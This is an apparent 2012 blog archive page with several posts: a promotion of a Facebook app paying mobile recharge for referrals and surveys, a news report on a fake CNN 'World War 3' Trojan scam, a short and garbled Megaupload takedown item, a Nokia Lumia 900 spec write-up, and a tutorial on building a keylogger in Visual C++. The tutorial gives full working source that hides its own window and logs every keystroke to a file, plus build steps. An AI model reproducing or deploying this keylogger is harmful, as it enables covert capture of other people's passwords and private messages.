Sunday, 19 February 2012

Get Free Recharge From EmbeePay | Facebook



    EmbeePay is a Facebook utility App which provides free Mobile Recharges just for completing offers and refering friends

How to use EmbeePay
  • Login into your Facebook Account.
  • Open EmbeePay Facebook Application by Clicking Here.
  • Now Confirm your mobile number and Emai ld address and get 100 points
  • Refer your friends for this application and you will get 300-1000 points for first 5 referals and for rest of the refreals you will be credited with 10% what they earn
  • To get more points you can also do surveys and offers  worth 5-180 points each.

Here Is Point Level

  • 150 points = $1/Rs. 50
  • 300 points = $2/ Rs. 100
  • 500 points = $4/ Rs. 200 
  • 800 points = $6/ Rs. 300 
  •  
What Is The Proof ?
 

Thursday, 9 February 2012

Facebook New Virus In Name Of 3rd World War Cnn

A fake news page saying, 'U.S. attacks Iran and Saudi Arabia, the begin (sic) of World War 3,' is the latest virus scam to circulate on Facebook.
The story uses CNN's logos, and appears to offer video footage of a breaking news story, but says users need to upgrade their Flash video software to watch.
When they 'upgrade', they in fact infect their PC with a trojan. Security experts Sophos reported at least 60,000 people have already fallen victim.
The fake news story directs users to a video, which then asks them to update their video player. The 'updated player' is in fact a Trojan that infects their PC
The fake news story directs users to a video, which then asks them to update their video player. The 'updated player' is in fact a Trojan that infects their PC
Cyber criminals have begun using fake news headlines to lure in victims on social networks such as Facebook.
Videos are often used as 'bait', because computer users are used to upgrading video software such as Flash, so installing software does not set off alarm bells.

 

'Naked Security has seen a worrying number of Facebook users posting the same status messages today, claiming that the United States has attacked Iran and Saudi Arabia in a move heralding the beginning of World War 3,' said Graham Cluley of Sophos's Naked Security blog.
'Within the first three hours of this malware campaign, some 60,000 Facebook users had been duped into visiting the malicious link.'
Clicking the link brings up a convincing looking error message asking users to update their Flash player
Clicking the link brings up a convincing looking error message asking users to update their Flash player

'What isn't entirely clear at this point is how the message is being shared by so many Facebook profiles.'
'It's possible that malicious code on users' computers is sending the message to Facebook without users knowing. To be on the safe side, you should scan your computer with up-to-date anti-virus software and ensure you have the latest security patches in place.'

Read more: http://www.dailymail.co.uk/sciencetech/article-2097671/Fake-CNN-war-report-Facebook-latest-virus-scam.html#ixzz1lu3bqzZ6(Original Source)

Sunday, 22 January 2012

Megaupload was taken down By FBI With SOPA















FBI stepped in and shut down one of the world's largest file-sharing sites Megaupload.com,


It Aso charged four people connected to it in New Zealand and seized Millions in cash from the authorities. However three of the higher authorities are on the run and thought not to be in New Zealand.

 
For many users, the shutdown had nothing to do with piracy and everything to do with the fact that their backups and data were now gone. 

Tuesday, 10 January 2012

Nokia Lumia 900 formally announced

Nokia has packed single-core 1.4 GHz processor in the Lumia 900 that features a 4.3-inch display and 8 MP camera.

Putting all speculations to rest, Nokia has formally announced its new Lumia 900 smartphone running Windows Phone OS.
This Windows Phone running Nokia smartphone has everything packed in a 0.45mm thin polycarbonate unibody enclosure. The Lumia 900 is first Nokia smartphone with Windows Phone with LTE network support and it will be launched in the USA though AT&T network exclusively.
Inspired from the Nokia N9 and Lumia 800 design, the new Lumia 900 features a 4.3-inch Amoled ClearBlack display that looks brilliant. Packed in a unibody polycarbonate enclosure, the Lumia 900 weighs just 156.8 grams approximately and is only 0.45mm thick.
The Lumia 900 comes with a single-core 1.4 GHz Qualcomm APQ8055 mobile processor and has MDM9200 chip for WCDMA network support. Nokia has provided a mere 512 MB RAM for this smartphone and offers 14.5 GB of on-board storage with no possibility to expand it — there's no memory card slot in it.

This handset supports quad-band GSM/WCDMA networks along with dual-band LTE networks that promise 50 Mbps download speeds for data connections.


Nokia has packed an 8 megapixel camera with the smartphone with Carl Zeiss optics for best quality of imaging. This 8-megapixel camera comes with a dual LED flash and auto focus which enhances its capability to click best quality photos and compete with best camera phones such as Apple iPhone 4S and Samsung Galaxy S II.
The Lumia 900's 8-megapixel camera features f2.2 aperture and 28mm focal length for the avid semi-professional photographers to make the best of their smartphone. This primary camera is capable of recording 720p HD video at 30 frames per second. Thankfully this Windows Phone device comes with a front facing 1 megapixel camera that can offer HD quality video chat support.

Nokia Drive app will come pre-loaded on the Lumia 900 and offer turn by turn based navigation support along with capability to download only the maps needed. Other features of the Lumia 900 include WiFi, Bluetooth 2.1, proximity sensor, magnetometer sensor, 3D accelerometer, gyroscope sensor, ambient light sensor and GPS.
Lumia 900 packs non-removable 1830 mAh battery that expected to offer a continuous talk time of 7 hours over both 2G and 3G Networks. Music lovers can play music till 60 hours on this handset or watch videos for 6.5 hours, the Finnish handset manufacturer claimed.
Apparently, the Nokia Lumia 900 is one of the first LTE Network supporting Windows Phone handset. Nokia hasn't announced the pricing and availability of this handset and we believe more details about the same shall be shared at the Mobile World Congress 2012 next month in Barcelona, Spain.

Original Post By The Mobile Indian Thanx To Them



Wednesday, 4 January 2012

How To Make Your Own Key Logger In Visual C++



Open Vissual C++


Go to File            -->     New

Select  Files Tab -->  Select  C++ Source File from list














Paste bellow code there



#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}












 Save it any where you like



 









Then go to Build       -->  Click Compile




 










Then again go to Build  --> Click  Build Cpp.Exe


Exit the C++


Go to the folder you have saved the data earlier


Go to Debug folder inside the folder



 











Click Cpp1.exe


Yes you are the owner of a keylogger


This Key Logger records all the keys pressed


Open log.txt to view the keys pressed


Use Task Manager to end the keylogger


Comments Doubts Bellow

Pageviews

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Enterprise Project Management